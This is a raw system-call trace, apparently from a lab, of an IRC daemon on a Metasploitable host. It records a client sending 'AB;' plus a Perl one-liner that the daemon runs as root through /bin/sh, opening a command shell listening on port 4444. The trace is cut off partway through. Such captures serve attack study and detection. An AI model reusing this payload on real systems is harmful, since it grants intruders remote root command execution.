4519  20:25:51.985757 select(1024, [2 3 4 7 9], [], NULL, {0, 960000}) = 1 (in [4], left {0, 530000})
4519  20:25:52.415054 clock_gettime(CLOCK_MONOTONIC, {48762, 232075284}) = 0
4519  20:25:52.415076 recv(4, "PRIVMSG  #testit0 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59
4519  20:25:52.415107 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415125 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415140 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415154 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415167 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415181 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415195 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415208 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415221 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415235 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415248 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415262 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415275 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415289 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415302 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415315 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415328 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415342 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415355 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415369 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415382 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415408 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.415467 gettimeofday({1495671952, 415471}, NULL) = 0
4519  20:25:52.415479 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 680000})
4519  20:25:52.735082 clock_gettime(CLOCK_MONOTONIC, {48762, 552102537}) = 0
4519  20:25:52.735103 recv(4, "PRIVMSG  #testit0 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45
4519  20:25:52.735127 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735144 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735159 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735173 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735186 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735200 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735214 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735228 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735241 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735254 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735268 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735281 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735294 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735315 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735329 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735342 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735356 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735369 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735383 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735396 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735410 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735423 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:25:52.735439 time(NULL)        = 1495671952
4519  20:25:52.735449 time(NULL)        = 1495671952
4519  20:25:52.735473 gettimeofday({1495671952, 735504}, NULL) = 0
4519  20:25:52.735526 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:25:52.735556 clock_gettime(CLOCK_MONOTONIC, {48762, 552568919}) = 0
4519  20:25:52.735566 gettimeofday({1495671952, 735570}, NULL) = 0
4519  20:25:52.735577 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 590000})
4519  20:25:53.145205 clock_gettime(CLOCK_MONOTONIC, {48762, 962214041}) = 0
4519  20:25:53.145205 accept(2, 0, NULL) = 5
4519  20:25:53.145215 getpeername(5, {sa_family=AF_INET, sin_port=htons(46275), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0
4519  20:25:53.145248 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:25:53.145261 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:25:53.145274 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
4519  20:25:53.145288 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0
4519  20:25:53.145299 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0
4519  20:25:53.145310 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0
4519  20:25:53.145322 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0
4519  20:25:53.155485 clock_gettime(CLOCK_MONOTONIC, {48762, 972494340}) = 0
4519  20:25:53.155485 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
4519  20:25:53.155486 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:25:53.155486 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:25:53.155486 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0
4519  20:25:53.155486 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0
4519  20:25:53.155487 send(6, "p%\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39
4519  20:25:53.155487 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)
4519  20:25:53.155487 gettimeofday({1495671953, 155487}, NULL) = 0
4519  20:25:53.155487 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})
4519  20:25:53.157676 clock_gettime(CLOCK_MONOTONIC, {48762, 974693491}) = 0
4519  20:25:53.157693 recvfrom(6, "p%\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0{\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116
4519  20:25:53.157733 close(6)          = 0
4519  20:25:53.157748 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)
4519  20:25:53.157762 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174
4519  20:25:53.157821 time(NULL)        = 1495671953
4519  20:25:53.157834 time(NULL)        = 1495671953
4519  20:25:53.157847 gettimeofday({1495671953, 157851}, NULL) = 0
4519  20:25:53.157859 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:25:53.157888 clock_gettime(CLOCK_MONOTONIC, {48762, 974901321}) = 0
4519  20:25:53.157899 gettimeofday({1495671953, 157911}, NULL) = 0
4519  20:25:53.157918 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {0, 990000})
4519  20:25:53.175858 clock_gettime(CLOCK_MONOTONIC, {48762, 992887244}) = 0
4519  20:25:53.175908 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244
4519  20:25:53.175956 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0
4519  20:25:53.175990 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
4519  20:25:53.176007 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4519  20:25:53.176023 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12337
12337 20:25:53.176221 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0
12337 20:25:53.176235 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0
12337 20:25:53.176266 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12337 20:25:53.176339 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0
12337 20:25:53.176629 brk(0)            = 0x80f9000
12337 20:25:53.176682 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12337 20:25:53.176699 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe1000
12337 20:25:53.176715 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
12337 20:25:53.176733 open("/etc/ld.so.cache", O_RDONLY) = 1
12337 20:25:53.176746 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12337 20:25:53.176764 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fd9000
12337 20:25:53.176774 close(1)          = 0
12337 20:25:53.176785 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12337 20:25:53.176809 open("/lib/libncurses.so.5", O_RDONLY) = 1
12337 20:25:53.176851 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512
12337 20:25:53.176975 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0
12337 20:25:53.176993 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fa9000
12337 20:25:53.177005 mmap2(0xb7fd6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fd6000
12337 20:25:53.177022 close(1)          = 0
12337 20:25:53.177034 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12337 20:25:53.177048 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
12337 20:25:53.177063 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
12337 20:25:53.177157 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
12337 20:25:53.177174 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fa5000
12337 20:25:53.177185 mmap2(0xb7fa7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fa7000
12337 20:25:53.177201 close(1)          = 0
12337 20:25:53.177212 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12337 20:25:53.177226 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
12337 20:25:53.177240 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
12337 20:25:53.177395 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
12337 20:25:53.177413 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fa4000
12337 20:25:53.177428 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e55000
12337 20:25:53.177453 mmap2(0xb7f9e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f9e000
12337 20:25:53.177467 mmap2(0xb7fa1000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fa1000
12337 20:25:53.177481 close(1)          = 0
12337 20:25:53.177503 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e54000
12337 20:25:53.177515 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e546b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
12337 20:25:53.177570 mprotect(0xb7f9e000, 4096, PROT_READ) = 0
12337 20:25:53.177606 munmap(0xb7fd9000, 29913) = 0
12337 20:25:53.177631 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12337 20:25:53.177645 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)
12337 20:25:53.177665 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbff4d910) = -1 ENOTTY (Inappropriate ioctl for device)
12337 20:25:53.177695 brk(0)            = 0x80f9000
12337 20:25:53.177704 brk(0x80fa000)    = 0x80fa000
12337 20:25:53.177716 brk(0x80fb000)    = 0x80fb000
12337 20:25:53.177736 getuid32()        = 0
12337 20:25:53.177745 getgid32()        = 0
12337 20:25:53.177755 geteuid32()       = 0
12337 20:25:53.177763 getegid32()       = 0
12337 20:25:53.177777 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12337 20:25:53.177799 time(NULL)        = 1495671953
12337 20:25:53.177833 brk(0x80fc000)    = 0x80fc000
12337 20:25:53.177864 brk(0x80fd000)    = 0x80fd000
12337 20:25:53.177897 open("/proc/meminfo", O_RDONLY) = 1
12337 20:25:53.177919 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
12337 20:25:53.177937 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe0000
12337 20:25:53.177949 read(1, "MemTotal:      1035240 kB\nMemFree:        155512 kB\nBuffers:        141648 kB\nCached:         494616 kB\nSwapCached:          0 kB\nActive:         520300 kB\nInactive:       304800 kB\nHighTotal:      131008 kB\nHighFree:          248 kB\nLowTotal:       904232 kB\nLowFree:        155264 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:             560 kB\nWriteback:           0 kB\nAnonPages:      188868 kB\nMapped:          52040 kB\nSlab:            32684 kB\nSReclaimable:    20220 kB\nSUnreclaim:      12464 kB\nPageTables:       2900 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   707968 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846
12337 20:25:53.178038 close(1)          = 0
12337 20:25:53.178049 munmap(0xb7fe0000, 4096) = 0
12337 20:25:53.178061 brk(0x80fe000)    = 0x80fe000
12337 20:25:53.178086 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
12337 20:25:53.178099 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
12337 20:25:53.178111 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12337 20:25:53.178123 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12337 20:25:53.178135 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
12337 20:25:53.178146 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
12337 20:25:53.178160 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12337 20:25:53.178171 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
12337 20:25:53.178184 uname({sys="Linux", node="metasploitable", ...}) = 0
12337 20:25:53.178232 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
12337 20:25:53.178249 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12337 20:25:53.178267 brk(0x8100000)    = 0x8100000
12337 20:25:53.178279 getcwd("/etc/unreal", 4096) = 12
12337 20:25:53.178302 getpid()          = 12337
12337 20:25:53.178342 getppid()         = 4519
12337 20:25:53.178375 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12337 20:25:53.178395 stat64("/sbin/sh", 0xbff4d8e8) = -1 ENOENT (No such file or directory)
12337 20:25:53.178408 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
12337 20:25:53.178425 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
12337 20:25:53.178449 socket(PF_FILE, SOCK_STREAM, 0) = 1
12337 20:25:53.178461 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
12337 20:25:53.178473 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
12337 20:25:53.178495 close(1)          = 0
12337 20:25:53.178506 socket(PF_FILE, SOCK_STREAM, 0) = 1
12337 20:25:53.178516 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
12337 20:25:53.178526 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
12337 20:25:53.178544 close(1)          = 0
12337 20:25:53.178558 open("/etc/nsswitch.conf", O_RDONLY) = 1
12337 20:25:53.178572 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
12337 20:25:53.178588 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe0000
12337 20:25:53.178600 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475
12337 20:25:53.178651 read(1, "", 4096) = 0
12337 20:25:53.178661 close(1)          = 0
12337 20:25:53.178671 munmap(0xb7fe0000, 4096) = 0
12337 20:25:53.178686 open("/etc/ld.so.cache", O_RDONLY) = 1
12337 20:25:53.178699 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12337 20:25:53.178715 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fd9000
12337 20:25:53.178725 close(1)          = 0
12337 20:25:53.178735 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12337 20:25:53.178750 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1
12337 20:25:53.178765 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 